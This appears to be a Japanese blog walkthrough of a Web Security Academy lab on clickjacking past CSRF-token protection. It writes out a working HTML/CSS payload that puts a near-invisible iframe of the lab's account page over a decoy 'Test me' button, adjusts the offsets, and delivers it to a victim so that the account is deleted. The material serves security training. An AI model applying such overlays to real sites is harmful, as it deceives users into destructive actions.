Hello there, ('ω')ノ

 

 CSRFトークン保護を使用した基本的なクリックジャッキングを。 

まずは、ログインして。

 

 

Account actionsをクリックしてページを表示して。

Delete accountをクリックすると。

 

 

CSRFトークンで保護されているようで。

 

 

一旦、Dropして。

 

 

ブラウザボタンで戻って。

クリックさせるおとりとなるウェブサイトを表示させて。

　https://ac541f071feb9c3380ca2cc600430089.web-security-academy.net/account

 

 

ページ上にかぶせるおとりのページを作成して。

opacityは、透明度を表していて。

下記をエクスプロイトサーバへ貼り付けて、View exploitを。

 

<style>
iframe {
　position:relative;
　width:700px;
　height: 500px;
　opacity: 0.0001;
　z-index: 2;
}
div {
　position:absolute;
　top:300px;
　left:60px;
　z-index: 1;
}
</style>

<div>Test me</div>

<iframe src="https://ac541f071feb9c3380ca2cc600430089.web-security-academy.net/account"></iframe>

 

 

マウスを当ててみると、Test meの位置とクリックできる位置がずれているので。

 

 

再度、位置の調整を。

　top:320px;

 

 

Click meとマウスのボタンの位置が一致したので、Deliver exploit victimを押すと。

 

 

クリアできた。

 

 

ちなみに透明度をOFFにすると、下記のようにターゲットとなる画面が表示されて。

 

 

下記のように透明度を変更すると、もっとクリックジャッキングが理解できるかも。
　opacity: 0.5

 

 

Best regards, (^^ゞ